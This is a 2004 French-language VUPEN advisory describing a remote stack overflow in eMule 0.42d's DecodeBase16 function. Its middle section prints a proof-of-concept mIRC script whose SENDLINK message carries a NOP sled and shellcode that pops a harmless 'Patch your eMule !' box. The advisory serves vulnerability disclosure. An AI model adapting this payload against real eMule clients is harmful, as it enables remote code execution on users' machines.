|
|
eMule v0.42d DecodeBase16 Remote Buffer Overflow Vulnerability |
|
Date de Publication : 2004-04-03 © VUPEN.COM
Titre : eMule v0.42d DecodeBase16 Remote Buffer Overflow Vulnerability
Identifiant : VUPEN/AVIS-2004-0086
CVE : GENERIC-MAP-NOMATCH
Risque : Critique (4/4) - 
Exploitable à distance : Oui
Exploitable en local : Oui
|
|
Une vulnérabilité critique a été identifiée dans eMule, elle pourrait être exploitée par un attaquant distant afin de compromettre une machine vulnérable. Cette faille de type stack overflow se situe au niveau de la fonction DecodeBase16 qui décode des valeurs sans vérification de leur longueurs. Cette fonction vulnérable est utilisée cinq fois dans le code (trois fois dans le serveur web qui nécessite une authentification, et deux fois dans le client IRC).
Exemple d'exploitation via SENDLINK qui appelle MessageBoxA puis affiche "Patch your eMule !" :
/bourriquet { .quote PRIVMSG $1$+(:,$chr(1),SENDLINK|,90909090909090909090909090909090909090909
090909090909090909090909090909090909090909090909090909090909090909090909090909090909090
909090909090909090909090EB0790907AF65700906681EC400031C96820210000684D756C6568757220656
86820796F685061746389E2515152513EFF15C0E76100503EFF1568E461009090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090909090909090909090909090909
090909090,|,$chr(1))
}
Crédit
Vulnérabilité découverte par Kostya Kortchinsky (Avril 2004)
Historique
2004-04-03 : Version Initiale
Recevez les bulletins VUPEN
Le service VUPEN Security VNS permet aux professionnels de la sécurité (RSSI, DSI, administrateurs et consultants) de recevoir en temps-réel, par email, SMS et flux RSS/XML, des bulletins de vulnérabilités complets, détaillés et personnalisés.
| |
|
